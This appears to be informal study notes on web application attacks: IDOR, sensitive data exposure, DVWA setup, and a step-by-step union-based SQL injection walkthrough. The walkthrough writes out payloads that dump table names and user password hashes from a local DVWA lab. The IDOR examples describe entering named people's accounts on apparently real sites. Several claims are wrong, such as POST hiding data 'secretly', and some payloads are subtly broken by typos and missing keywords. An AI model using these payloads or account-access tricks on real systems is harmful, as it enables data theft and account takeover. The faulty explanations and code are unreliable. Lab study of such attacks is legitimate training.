METHODS USED IN WEB APPLICATIONS
1. GET – It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
eg. php?id=1, ?cat=54, ?test=query.
2. POST – The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
INSECURE DIRECT OBJECT REFERENCE
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
For eg. :
CHJM Website :
Accessing into another user –
www.chjm.org/login/../php?id=1411 ( entered into Logan’s Account)
Accessing into pages which are not authorized to a basic user-
EG : arvindsharma.com > Login
URL > arvindsharma.com
/account/ > fOLDER
user.php > Code
1337 > Sanjeev Multani
Kshitij > 1111 > 1337 > Sanjeev’s account
SENSITIVE DATA EXPOSURE
Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
Types of Sensitive Data
1. Personal – Names, Address , Contact Numbers etc.
2. Confidential – ID,Passwords – Credentials, Aadhar No.
3. Financial – Bank Accounts numbers, credit cards, debity cards etc.
4. Health Information – Policies etc.
Demonstration on LVS.
DVWA SETUP AND CONFIGURATION
DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application Attacks for OWASP TOP 10 like LVS.
Copy zip file into C:\xampp\htdocs
Right click the zip file, click on extract here
start xampp server, start apache and mysql
Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
Open the browser, goto 127.0.0.1/dvwa
It will show you a message “Click here to create the Database”.
After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
Go through the Instruction Page of LVS and then start learning through it.
OWASP A1. INJECTIONS
UNION BASED SQL INJECTION
UNION BASED SQLI is a type of attack in which a attacker inputs some kind of malicious sql queries in the input method of the web application, and it get affected on the database resiulting out by extracting the “juicy” data.
DATABASE > TABLES > COLUMNS > ROWS
–+ : FOR ANY COMMAND I ENTER INTO THE INPUT METHOD, I HAVE TO ENTER –+ AFTER THAT TO MAKE IT A SQL QUERY.
table_name – Table ka naam
column_name – Column ka naam
Information ki maa
1. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
2. –+ : Everything written with –+ would be acted like a SQL QUERY.
3. # : Everything entered after # will not be considered.
4. database() – name of the database
5. version() – version of the database.
Target – http://127.0.0.1/dvwa/vulnerabilities/sqli/
STEPS – For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode
Step 1: To find the GET Method/Parameter
Trying to click each and every possible link or will give inputs to the search boxes of GET Method.
Step 2: Check if my site is Vulnerable or not to Union Based SQLI
If we get an error that means my website is vulnerable to Union Based SQLI.
It will give – “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 “
Step 3: To check the number of columns present in the database
order by 100–+
order by 200–+
order by 300–+
Until we get an error of “Unknown Order Clause”.
Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 1–+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 2–+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 3–+&Submit=Submit#
Unknown column ‘3’ in ‘order clause’
Step 4: To Union Select the columns which are present in the Database and is Vulnerable
union select 1,2–+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select 1,2–+ &Submit=Submit#
Step 5: Extracting Information from Database
– union select version(),2–+
– union select 1,version()–+
– union select all 1,version()–+ : 10.1.25-MariaDB
– union select all 1,database()–+ : dvwa
Step 6: Calling the Mother of Database – information_schema
= Extracting Table Names
– union select all 1,table_names from information_schema.tables–+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select all 1,table_name from information_schema.tables–+&Submit=Submit#
= After Selecting a Juicy Table, Extracting data of that table :
– column_name, information_schema.columns
– union select all 1, columns_name from information_schema.columns where table_name=”users”–+
= To get the data from columns (user, password)
– union select user,password from users–+
– http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ group_concat(user,0x0a,password),2 from users–+
And we will get the Juicy Data.